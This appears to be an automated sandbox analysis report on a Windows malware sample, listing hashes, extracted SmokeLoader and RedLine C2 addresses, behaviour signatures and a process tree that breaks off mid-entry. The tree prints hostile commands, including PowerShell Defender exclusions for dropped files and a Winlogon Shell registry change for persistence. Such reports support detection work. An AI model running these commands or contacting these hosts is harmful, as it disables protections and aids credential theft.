Resubmissions

08-11-2021 14:05

211108-rdywgshdbk 10

08-11-2021 13:46

211108-q2zl9ahcgq 10

Analysis

  • max time kernel
    308s
  • max time network
    311s
  • platform
    windows11_x64
  • resource
    win11
  • submitted
    08-11-2021 14:05

General

  • Target

    040d9a95f9e954e29ceb2469fcf3a9e9.exe

  • Size

    228KB

  • MD5

    040d9a95f9e954e29ceb2469fcf3a9e9

  • SHA1

    e04f9f919575e694dc4fe2f7f4646fc3440457b5

  • SHA256

    b6a1ce3e1d1dfa3057e7473c9219ba29218014de81c922ad38e96800c1f388e7

  • SHA512

    6fd2ae969ea6e3184929aa8e04a024432a135523a9508acf0372b2821660df1aace14a97de195101a6f2af0667ad4b7b64b60b3c414cac9a30079485f6bd4669

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://nalirou70.top/

http://xacokuo80.top/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

new2

C2

93.115.20.139:28978

Extracted

Family

redline

Botnet

SuperStar

C2

185.215.113.29:36224

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 3 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 12 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 16 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Turns off Windows Defender SpyNet reporting 2 TTPs
  • UAC bypass 3 TTPs
  • Windows security bypass 2 TTPs
  • suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

    suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

  • Nirsoft 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 43 IoCs
  • Sets file to hidden 1 TTPs

    Modifies file attributes to stop it showing in Explorer etc.

  • Stops running service(s) 3 TTPs
  • Drops startup file 4 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 15 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 8 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 12 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 12 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 64 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 24 IoCs
  • Gathers network information 2 TTPs 4 IoCs

    Uses commandline utility to view network configuration.

  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 10 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 4 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\040d9a95f9e954e29ceb2469fcf3a9e9.exe
    "C:\Users\Admin\AppData\Local\Temp\040d9a95f9e954e29ceb2469fcf3a9e9.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1148
    • C:\Users\Admin\AppData\Local\Temp\040d9a95f9e954e29ceb2469fcf3a9e9.exe
      "C:\Users\Admin\AppData\Local\Temp\040d9a95f9e954e29ceb2469fcf3a9e9.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:2460
  • C:\Users\Admin\AppData\Local\Temp\27B2.exe
    C:\Users\Admin\AppData\Local\Temp\27B2.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:3916
    • C:\Users\Admin\AppData\Local\Temp\27B2.exe
      C:\Users\Admin\AppData\Local\Temp\27B2.exe
      2⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:3180
  • C:\Users\Admin\AppData\Local\Temp\3668.exe
    C:\Users\Admin\AppData\Local\Temp\3668.exe
    1⤵
    • Executes dropped EXE
    PID:1264
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1264 -s 272
      2⤵
      • Program crash
      • Checks processor information in registry
      • Enumerates system info in registry
      • Suspicious use of AdjustPrivilegeToken
      PID:1860
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 1264 -ip 1264
    1⤵
    • Suspicious use of NtCreateProcessExOtherParentProcess
    • Suspicious use of WriteProcessMemory
    PID:3036
  • C:\Users\Admin\AppData\Local\Temp\48B9.exe
    C:\Users\Admin\AppData\Local\Temp\48B9.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:2024
  • C:\Users\Admin\AppData\Local\Temp\5443.exe
    C:\Users\Admin\AppData\Local\Temp\5443.exe
    1⤵
    • Executes dropped EXE
    PID:2100
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2100 -s 292
      2⤵
      • Program crash
      • Checks processor information in registry
      • Enumerates system info in registry
      PID:2700
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2100 -ip 2100
    1⤵
    • Suspicious use of NtCreateProcessExOtherParentProcess
    • Suspicious use of WriteProcessMemory
    PID:4432
  • C:\Users\Admin\AppData\Local\Temp\6859.exe
    C:\Users\Admin\AppData\Local\Temp\6859.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:2804
    • C:\Users\Admin\AppData\Local\Temp\6859.exe
      C:\Users\Admin\AppData\Local\Temp\6859.exe
      2⤵
      • Executes dropped EXE
      PID:2488
  • C:\Users\Admin\AppData\Local\Temp\86BF.exe
    C:\Users\Admin\AppData\Local\Temp\86BF.exe
    1⤵
    • Executes dropped EXE
    PID:420
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 420 -s 276
      2⤵
      • Program crash
      • Checks processor information in registry
      • Enumerates system info in registry
      PID:1932
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 420 -ip 420
    1⤵
    • Suspicious use of NtCreateProcessExOtherParentProcess
    • Suspicious use of WriteProcessMemory
    PID:916
  • C:\Users\Admin\AppData\Local\Temp\942D.exe
    C:\Users\Admin\AppData\Local\Temp\942D.exe
    1⤵
    • Executes dropped EXE
    PID:4844
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4844 -s 296
      2⤵
      • Program crash
      • Checks processor information in registry
      • Enumerates system info in registry
      PID:2228
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4844 -ip 4844
    1⤵
    • Suspicious use of NtCreateProcessExOtherParentProcess
    • Suspicious use of WriteProcessMemory
    PID:1072
  • C:\Users\Admin\AppData\Local\Temp\AB41.exe
    C:\Users\Admin\AppData\Local\Temp\AB41.exe
    1⤵
    • Executes dropped EXE
    PID:3016
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 280
      2⤵
      • Program crash
      • Checks processor information in registry
      • Enumerates system info in registry
      PID:3264
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 3016 -ip 3016
    1⤵
    • Suspicious use of NtCreateProcessExOtherParentProcess
    • Suspicious use of WriteProcessMemory
    PID:3344
  • C:\Users\Admin\AppData\Local\Temp\B44A.exe
    C:\Users\Admin\AppData\Local\Temp\B44A.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3304
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.youtube.com
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3496
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.youtube.com
      2⤵
        PID:3016
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.youtube.com
        2⤵
          PID:5104
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.youtube.com
          2⤵
            PID:1892
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.youtube.com
            2⤵
              PID:5392
            • C:\Users\Admin\AppData\Local\Temp\B44A.exe
              C:\Users\Admin\AppData\Local\Temp\B44A.exe
              2⤵
              • Executes dropped EXE
              PID:5176
            • C:\Users\Admin\AppData\Local\Temp\B44A.exe
              C:\Users\Admin\AppData\Local\Temp\B44A.exe
              2⤵
              • Executes dropped EXE
              PID:5600
          • C:\Users\Admin\AppData\Local\Temp\C91B.exe
            C:\Users\Admin\AppData\Local\Temp\C91B.exe
            1⤵
            • Executes dropped EXE
            PID:2192
            • C:\Users\Admin\AppData\Local\Temp\123.exe
              "C:\Users\Admin\AppData\Local\Temp\123.exe"
              2⤵
              • Executes dropped EXE
              • Drops startup file
              • Windows security modification
              • Adds Run key to start application
              • Checks whether UAC is enabled
              • Suspicious use of SetThreadContext
              • Drops file in Windows directory
              • System policy modification
              PID:3780
              • C:\Users\Admin\AppData\Local\Temp\acd2f948-9567-44da-ae8f-fd7428fc8cdd\AdvancedRun.exe
                "C:\Users\Admin\AppData\Local\Temp\acd2f948-9567-44da-ae8f-fd7428fc8cdd\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\acd2f948-9567-44da-ae8f-fd7428fc8cdd\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                3⤵
                • Executes dropped EXE
                PID:5532
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\acd2f948-9567-44da-ae8f-fd7428fc8cdd\test.bat"
                  4⤵
                    PID:5732
                • C:\Users\Admin\AppData\Local\Temp\8ec9aa74-5ae5-4178-afe3-73f048b40edc\AdvancedRun.exe
                  "C:\Users\Admin\AppData\Local\Temp\8ec9aa74-5ae5-4178-afe3-73f048b40edc\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\8ec9aa74-5ae5-4178-afe3-73f048b40edc\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                  3⤵
                  • Executes dropped EXE
                  PID:5564
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8ec9aa74-5ae5-4178-afe3-73f048b40edc\test.bat"
                    4⤵
                      PID:5828
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\123.exe" -Force
                    3⤵
                      PID:5868
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\123.exe" -Force
                      3⤵
                        PID:5288
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\123.exe" -Force
                        3⤵
                          PID:5280
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deforcing.exe" -Force
                          3⤵
                            PID:5884
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deforcing.exe" -Force
                            3⤵
                            • Suspicious use of NtCreateProcessExOtherParentProcess
                            PID:3256
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\123.exe" -Force
                            3⤵
                              PID:5896
                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deforcing.exe
                              "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deforcing.exe"
                              3⤵
                              • Executes dropped EXE
                              • Adds Run key to start application
                              • Checks whether UAC is enabled
                              • Suspicious use of SetThreadContext
                              • System policy modification
                              PID:6256
                              • C:\Users\Admin\AppData\Local\Temp\c35cdb36-88d7-4e83-8bdd-86f7ba859d65\AdvancedRun.exe
                                "C:\Users\Admin\AppData\Local\Temp\c35cdb36-88d7-4e83-8bdd-86f7ba859d65\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\c35cdb36-88d7-4e83-8bdd-86f7ba859d65\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                4⤵
                                • Executes dropped EXE
                                PID:6992
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\c35cdb36-88d7-4e83-8bdd-86f7ba859d65\test.bat"
                                  5⤵
                                    PID:5000
                                • C:\Users\Admin\AppData\Local\Temp\d9ae3a18-9698-449b-8981-2f3593b80b72\AdvancedRun.exe
                                  "C:\Users\Admin\AppData\Local\Temp\d9ae3a18-9698-449b-8981-2f3593b80b72\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\d9ae3a18-9698-449b-8981-2f3593b80b72\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                  4⤵
                                  • Executes dropped EXE
                                  PID:6156
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\d9ae3a18-9698-449b-8981-2f3593b80b72\test.bat"
                                    5⤵
                                      PID:6572
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deforcing.exe" -Force
                                    4⤵
                                      PID:6116
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deforcing.exe" -Force
                                      4⤵
                                        PID:4112
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deforcing.exe" -Force
                                        4⤵
                                          PID:6240
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\appertaining\svchost.exe" -Force
                                          4⤵
                                            PID:3148
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\appertaining\svchost.exe" -Force
                                            4⤵
                                              PID:7520
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deforcing.exe" -Force
                                              4⤵
                                                PID:7320
                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess.exe
                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess.exe"
                                                4⤵
                                                  PID:8180
                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe
                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe"
                                                  4⤵
                                                    PID:7556
                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regsql.exe
                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regsql.exe"
                                                    4⤵
                                                      PID:7648
                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regsql.exe
                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regsql.exe"
                                                      4⤵
                                                        PID:4152
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\appertaining\svchost.exe" -Force
                                                      3⤵
                                                        PID:6596
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\123.exe" -Force
                                                        3⤵
                                                          PID:7160
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\appertaining\svchost.exe" -Force
                                                          3⤵
                                                            PID:6652
                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regsql.exe
                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regsql.exe"
                                                            3⤵
                                                              PID:6188
                                                          • C:\Users\Admin\AppData\Local\Temp\OlecranonsCasein.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\OlecranonsCasein.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            PID:2996
                                                            • C:\Users\Admin\AppData\Local\Temp\OlecranonsCasein.exe
                                                              C:\Users\Admin\AppData\Local\Temp\OlecranonsCasein.exe
                                                              3⤵
                                                              • Executes dropped EXE
                                                              PID:5328
                                                        • C:\Users\Admin\AppData\Local\Temp\D234.exe
                                                          C:\Users\Admin\AppData\Local\Temp\D234.exe
                                                          1⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of SetThreadContext
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:940
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ipconfig /release
                                                            2⤵
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:1048
                                                            • C:\Windows\SysWOW64\ipconfig.exe
                                                              "C:\Windows\system32\ipconfig.exe" /release
                                                              3⤵
                                                              • Gathers network information
                                                              PID:4036
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping twitter.com
                                                            2⤵
                                                              PID:1584
                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                "C:\Windows\system32\PING.EXE" twitter.com
                                                                3⤵
                                                                • Runs ping.exe
                                                                PID:3896
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping twitter.com
                                                              2⤵
                                                                PID:2744
                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                  "C:\Windows\system32\PING.EXE" twitter.com
                                                                  3⤵
                                                                  • Runs ping.exe
                                                                  PID:4120
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping twitter.com
                                                                2⤵
                                                                  PID:4652
                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                    "C:\Windows\system32\PING.EXE" twitter.com
                                                                    3⤵
                                                                    • Runs ping.exe
                                                                    PID:5456
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping twitter.com
                                                                  2⤵
                                                                    PID:5836
                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                      "C:\Windows\system32\PING.EXE" twitter.com
                                                                      3⤵
                                                                      • Runs ping.exe
                                                                      PID:4624
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping twitter.com
                                                                    2⤵
                                                                      PID:8176
                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                        "C:\Windows\system32\PING.EXE" twitter.com
                                                                        3⤵
                                                                        • Runs ping.exe
                                                                        PID:5516
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ipconfig /renew
                                                                      2⤵
                                                                        PID:5620
                                                                        • C:\Windows\SysWOW64\ipconfig.exe
                                                                          "C:\Windows\system32\ipconfig.exe" /renew
                                                                          3⤵
                                                                          • Gathers network information
                                                                          PID:1084
                                                                      • C:\Users\Admin\AppData\Local\Temp\D234.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\D234.exe
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        PID:2992
                                                                      • C:\Users\Admin\AppData\Local\Temp\D234.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\D234.exe
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        PID:1872
                                                                    • C:\Users\Admin\AppData\Local\Temp\E197.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\E197.exe
                                                                      1⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of SetThreadContext
                                                                      PID:1996
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ipconfig /release
                                                                        2⤵
                                                                          PID:3680
                                                                          • C:\Windows\SysWOW64\ipconfig.exe
                                                                            "C:\Windows\system32\ipconfig.exe" /release
                                                                            3⤵
                                                                            • Gathers network information
                                                                            PID:3344
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping twitter.com
                                                                          2⤵
                                                                            PID:1940
                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                              "C:\Windows\system32\PING.EXE" twitter.com
                                                                              3⤵
                                                                              • Runs ping.exe
                                                                              PID:3240
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping twitter.com
                                                                            2⤵
                                                                              PID:1788
                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                "C:\Windows\system32\PING.EXE" twitter.com
                                                                                3⤵
                                                                                • Runs ping.exe
                                                                                PID:1304
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping twitter.com
                                                                              2⤵
                                                                                PID:5416
                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                  "C:\Windows\system32\PING.EXE" twitter.com
                                                                                  3⤵
                                                                                  • Runs ping.exe
                                                                                  PID:1080
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping twitter.com
                                                                                2⤵
                                                                                  PID:6332
                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                    "C:\Windows\system32\PING.EXE" twitter.com
                                                                                    3⤵
                                                                                    • Runs ping.exe
                                                                                    PID:6176
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping twitter.com
                                                                                  2⤵
                                                                                    PID:7924
                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                      "C:\Windows\system32\PING.EXE" twitter.com
                                                                                      3⤵
                                                                                      • Runs ping.exe
                                                                                      PID:3664
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ipconfig /renew
                                                                                    2⤵
                                                                                      PID:7620
                                                                                      • C:\Windows\SysWOW64\ipconfig.exe
                                                                                        "C:\Windows\system32\ipconfig.exe" /renew
                                                                                        3⤵
                                                                                        • Gathers network information
                                                                                        PID:6800
                                                                                    • C:\Users\Admin\AppData\Local\Temp\E197.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\E197.exe
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      • Modifies system certificate store
                                                                                      PID:4032
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 624
                                                                                        3⤵
                                                                                        • Program crash
                                                                                        • Checks processor information in registry
                                                                                        • Enumerates system info in registry
                                                                                        PID:5844
                                                                                  • C:\Users\Admin\AppData\Local\Temp\EED6.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\EED6.exe
                                                                                    1⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:2156
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Local\chromedrlver.exe,"
                                                                                      2⤵
                                                                                        PID:1280
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Local\chromedrlver.exe,"
                                                                                          3⤵
                                                                                            PID:2044
                                                                                        • C:\Users\Admin\AppData\Local\chromedrlver.exe
                                                                                          "C:\Users\Admin\AppData\Local\chromedrlver.exe"
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:7420
                                                                                          • C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:1620
                                                                                      • C:\Users\Admin\AppData\Local\Temp\FEA6.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\FEA6.exe
                                                                                        1⤵
                                                                                        • Executes dropped EXE
                                                                                        • Drops startup file
                                                                                        • Windows security modification
                                                                                        • Adds Run key to start application
                                                                                        • Checks whether UAC is enabled
                                                                                        • Suspicious use of SetThreadContext
                                                                                        • Drops file in Windows directory
                                                                                        • System policy modification
                                                                                        PID:4016
                                                                                        • C:\Users\Admin\AppData\Local\Temp\cfd2c909-98c0-493c-bc5a-8fe1a101cd42\AdvancedRun.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\cfd2c909-98c0-493c-bc5a-8fe1a101cd42\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\cfd2c909-98c0-493c-bc5a-8fe1a101cd42\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:1708
                                                                                          • C:\Windows\system32\cmd.exe
